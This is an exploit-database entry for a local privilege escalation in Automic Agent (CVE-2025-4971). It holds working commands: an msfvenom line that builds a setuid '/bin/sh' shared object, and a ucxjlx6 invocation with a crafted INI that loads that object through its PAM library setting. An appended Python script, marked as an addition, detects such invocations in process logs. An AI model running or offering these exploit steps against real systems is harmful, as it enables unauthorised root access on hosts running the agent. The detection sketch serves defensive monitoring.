Automic Agent 24.3.0 HF4 – Privilege Escalation

Exploit Details

Basic Information

Exploit Title: Automic Agent 24.3.0 HF4 – Privilege Escalation
Exploit ID: EDB-ID:52309
Type: exploitdb
Published: 2025-05-29T00:00:00
Modified: 2025-05-29T00:00:00

CVSS Information

CVSS Score: 8.5
Severity: HIGH
Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/SC:L/VI:H/SI:L/VA:H/SA:L

CVE Information

  • CVE-2025-4971

Exploit Description

Exploit Title: Automic Agent 24.3.0 HF4 – Privilege Escalation Date: 26.05.2025…

Exploit Code

# Exploit Title: Automic Agent 24.3.0 HF4 – Privilege Escalation
# Date: 26.05.2025
# Exploit Author: Flora Schäfer
# Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation
# Version: <24.3.0 HF4, <21.0.13 HF1
# Tested on: Linux
# CVE : CVE-2025-4971

1. Generate shared object file using msfvenom

$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so

2. Run the ucxjlx6 executable as follows

$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")
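
A detection sketch for step 2, added here and not part of the original exploit entry: bash expands `<(...)` to a `/dev/fd/N` path, so process-execution logs show `ucxjlx6` started with an `ini=` argument outside the agent's own directory. The install path `/opt/automic/agent/bin/`, the function names and the sample command lines are assumptions constructed for illustration.

```python
import os
import shlex

AGENT_BINARY = "ucxjlx6"   # agent executable named in step 2
# Assumption: directories where a legitimate agent INI may live; adjust per host.
TRUSTED_INI_DIRS = ("/opt/automic/agent/bin/",)

def suspicious_ini_arg(cmdline):
    """Return a reason if an agent invocation loads an untrusted INI, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes in the log line
        argv = cmdline.split()
    if not argv or os.path.basename(argv[0]) != AGENT_BINARY:
        return None
    for arg in argv[1:]:
        key, sep, value = arg.partition("=")
        if not sep or key.lower() != "ini":
            continue
        path = os.path.normpath(value)   # collapses ../ segments; symlinks are not resolved
        if path.startswith(("/dev/fd/", "/proc/")):
            return "ini read from a file descriptor: " + value
        if not path.startswith(TRUSTED_INI_DIRS):
            return "ini outside trusted directories: " + value
    return None

def scan(cmdlines):
    """Return (command line, reason) pairs for every flagged invocation."""
    hits = []
    for line in cmdlines:
        reason = suspicious_ini_arg(line)
        if reason:
            hits.append((line, reason))
    return hits

# Constructed sample command lines, as process-execution telemetry would record them.
SAMPLE = [
    "/opt/automic/agent/bin/ucxjlx6 ini=/opt/automic/agent/bin/ucxjlx6.ini",
    "./ucxjlx6 ini=/dev/fd/63",
    "/opt/automic/agent/bin/ucxjlx6 ini=/tmp/a.ini",
    "/usr/bin/ls -l /tmp",
]

if __name__ == "__main__":
    for line, reason in scan(SAMPLE):
        print(reason, "<-", line)
```
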
